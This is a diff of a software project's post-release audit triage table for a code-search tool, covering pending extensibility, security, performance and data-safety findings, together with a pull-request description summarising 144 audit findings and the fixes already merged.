-- **#1105 (slots+cache) introduced 8+ TOCTOU/race/cache-mismatch findings.** slot_remove vs slot_promote, slot migrate rollback, embedding_cache purpose column missing, model_fingerprint timestamp fallback breaking cross-slot copy, evict-vs-write race, EmbeddingCache vs QueryCache zero-handling divergence, cache stats silent-zero. The cache+slots subsystem is overdue for a hardening pass with locks (`.cqs/slots.lock`) and schema purposes.
-- **Determinism regressions cluster around HashMap iteration in algorithm code.** semantic_diff sort, bfs_expand seed enqueue, contrastive_neighbors top-K, doc_comments select, map_hunks_to_functions, find_type_overlap chunk_info — six findings, all the same root cause (HashMap iter into score-sorted result), and all easy fixes. One sweep PR closes them.
-- **The v1.30.0 critical surfaces shipped without tests.** #1113 (non-blocking HNSW rebuild), #1114 (single-registration registry), #1118 (serve auth — strip_token_param, missing-Host), #1120 (execution-provider split), serve data endpoints, 16 batch dispatch handlers — all under-tested. TC-HAP findings P2.78–P2.87 form a coherent test-debt PR series that would close ~10 findings and provide regression protection for the next release.
-- **Observability "applied to new modules but default-off" pattern.** v0.12.1 lesson lifted spans into every new module, but OB-V1.30-1 reveals the default subscriber drops everything. Fixing the default plus structured-field cleanup (P3.13) and lazy span propagation across spawn_blocking (P2.25) would make the existing instrumentation actually useful in production.
+| ID | Title | Category | Location | Effort | Status |
+|----|-------|----------|----------|--------|--------|
+| EX-V1.30.1-1 | `daemon_ping`/`status`/`reconcile` are three near-identical 80-LOC copies — refactor target | Extensibility | `src/daemon_translate.rs:271-621` | medium | pending |
+| EX-V1.30.1-2 | `BatchCmd` dispatch is 130-line hand-routed match; macro escape hatch already proven | Extensibility | `src/cli/batch/commands.rs:503-636` | medium | pending |
+| EX-V1.30.1-4 | `write_slot_model` clobbers all non-`[embedding]` keys — adding any per-slot field is breaking | Extensibility | `src/slot/mod.rs:307-351` | medium | pending |
+| EX-V1.30.1-5 | `check_request` is hardcoded three-channel ladder — fourth auth channel needs trait + registry | Extensibility | `src/serve/auth.rs:269-321, 246-260, 323-332` | medium | pending |
+| EX-V1.30.1-6 | Reconcile fingerprint is `(path, mtime)` only — content-hash/size detection needs schema migration | Extensibility | `src/cli/watch/reconcile.rs:84-134` | hard | pending |
+| EX-V1.30.1-8 | `Reranker` is concrete struct with hardcoded ONNX assumptions — no trait, blocks ablations | Extensibility | `src/reranker.rs:108-211` | hard | pending |
+| SEC-V1.30.1-5 | Search results emit `trust_level: "user-code"` for vendored third-party content in project tree | Security | `src/store/helpers/types.rs:172-196` | hard | pending |
+| SEC-V1.30.1-6 | `cqs ref add` accepts symlinked source path with no audit — references can index outside source root | Security | `src/cli/commands/infra/reference.rs:130-150` | medium | pending |
+| SEC-V1.30.1-7 | `LocalProvider` follows up to 2 redirects on `Authorization`-bearing requests — bearer leak risk | Security | `src/llm/local.rs:124-129, 435-437` | medium | pending |
+| PB-V1.30.1-4 | `open_browser` on WSL launches Linux browser via `xdg-open` instead of Windows default | Platform Behavior | `src/cli/commands/serve.rs:99-132` | medium | pending |
+| PB-V1.30.1-5 | `events.rs` mtime-equality skip wrong on macOS HFS+ — only `is_wsl_drvfs_path` triggers strict `<` | Platform Behavior | `src/cli/watch/events.rs:85-102` | medium | pending |
+| PF-V1.30.1-2 | `wait_for_fresh` polls daemon every 250 ms with fresh socket connect + JSON round-trip | Performance | `src/daemon_translate.rs:660-679, 422-510` | medium | pending. Notes: covered by RB-9 + RM-2. |
+| PF-V1.30.1-3 | Periodic GC and reconcile each call `enumerate_files` independently — back-to-back tree walks | Performance | `src/cli/watch/mod.rs:1198-1283`, `gc.rs:209`, `reconcile.rs:74` | medium | pending |
+| PF-V1.30.1-8 | `indexed_file_origins` returns `HashMap<String, Option<i64>>` from `SELECT DISTINCT` overwrites silently | Performance | `src/store/chunks/staleness.rs:627-637` | medium | pending |
+| RM-2 | `wait_for_fresh` opens fresh socket connect+disconnect every 250ms for up to 600s | Resource Management | `src/daemon_translate.rs:660-679, 438` | medium | pending |
+| RM-5 | Reconcile pass holds entire repo's filename set + index origins simultaneously every 30s | Resource Management | `src/cli/watch/reconcile.rs:74-90`, `lib.rs:618` | medium | pending |
+| TC-HAP-1.30.1-6 | `process_file_changes` — central watch-loop reindex function has zero direct tests | Test Coverage (happy) | `src/cli/watch/events.rs:131-300+` | hard | pending |
+| DS-V1.30.1-D3 | Periodic reconcile reads through stale `store` handle on `cqs index --force` race | Data Safety | `src/cli/watch/mod.rs:1262-1283` | medium | pending |
+| DS-V1.30.1-D4 | `slot remove` does not check whether daemon is actively serving the slot it deletes | Data Safety | `src/cli/commands/infra/slot.rs:322-369` | medium | pending |
+| DS-V1.30.1-D6 | `WatchSnapshot.delta_saturated` ignored by `compute()` — duplicate of CQ-V1.30.1-2 | Data Safety | `src/watch_status.rs:199-209` | easy | pending. Notes: covered by CQ-V1.30.1-2 (P1). |
+| DS-V1.30.1-D8 | `dropped_this_cycle` reset before snapshot publish — duplicate of CQ-V1.30.1-1 | Data Safety | `src/cli/watch/events.rs:139-146` | easy | pending. Notes: covered by CQ-V1.30.1-1 (P1). |
+| DOC-V1.30.1-8 | CONTRIBUTING test count + file count out of date — folded into DOC-V1.30.1-3 | Documentation | `CONTRIBUTING.md` | easy | pending. Notes: subsumed by DOC-V1.30.1-3. |


### PR DESCRIPTION
## Summary

- Land v1.30.1 post-release audit artifacts: findings, triage (P1-P4), fix prompts
- Mark all 14 P1 items as fixed across PRs #1199-#1203 (all merged)
- Fix mislabeled v1.30.0 archives that held v1.29.0 content from the prior cycle (original content preserved in git history)

## v1.30.1 audit at a glance

- **144 findings** from 16 parallel auditors (2 batches of 8)
- Tiers: P1=14, P2=32, P3=78, P4=23
- **P1 status**: all 14 fixed and merged
  - CQ/AC freshness gate (delta_saturated, dropped_this_cycle reset) → #1202
  - Auth surface (token leakage, cookie precedence, CQS_LLM_API_KEY journal leak) → #1201
  - Lying-docs cluster (PRIVACY/SECURITY/ROADMAP) → #1199, #1200, #1201
  - Wiring regression (embed_batch_size_for dead) → #1203
  - Reconcile correctness (cap bypass, strict mtime predicate) → #1203

## Cross-cutting themes

| Theme | Findings | Disposition |
|-------|----------|-------------|
| `delta_saturated` half-wired | 3 | Fixed in #1202 |
| `dropped_this_cycle` reset-before-publish | 3 | Fixed in #1202 |
| `wait_for_fresh` papercuts | 9+ | Deferred to P2 batch refactor |
| Lying docs cluster | 5 | Fixed in #1199-#1201 |
| v0.12.1 swallow-error recurrence | 7+ | P2/P3 |
| `#1182` commands shipped untested | 5 | P2 |
| Three-channel auth gaps | 4 | Fixed in #1201 |

## Test plan

- [x] All 14 P1 items merged to main and CI green
- [ ] Verify audit-findings.md has v1.30.1 header
- [ ] Verify audit-triage.md shows 14/14 P1 marked `✅ PR #11xx`
- [ ] Verify audit-fix-prompts.md is 7069 lines (P1+P2+P3+P4 trivial)
- [ ] No-code change — docs only, CI clippy/fmt/test should be no-op

🤖 Generated with [Claude Code](https://claude.com/claude-code)
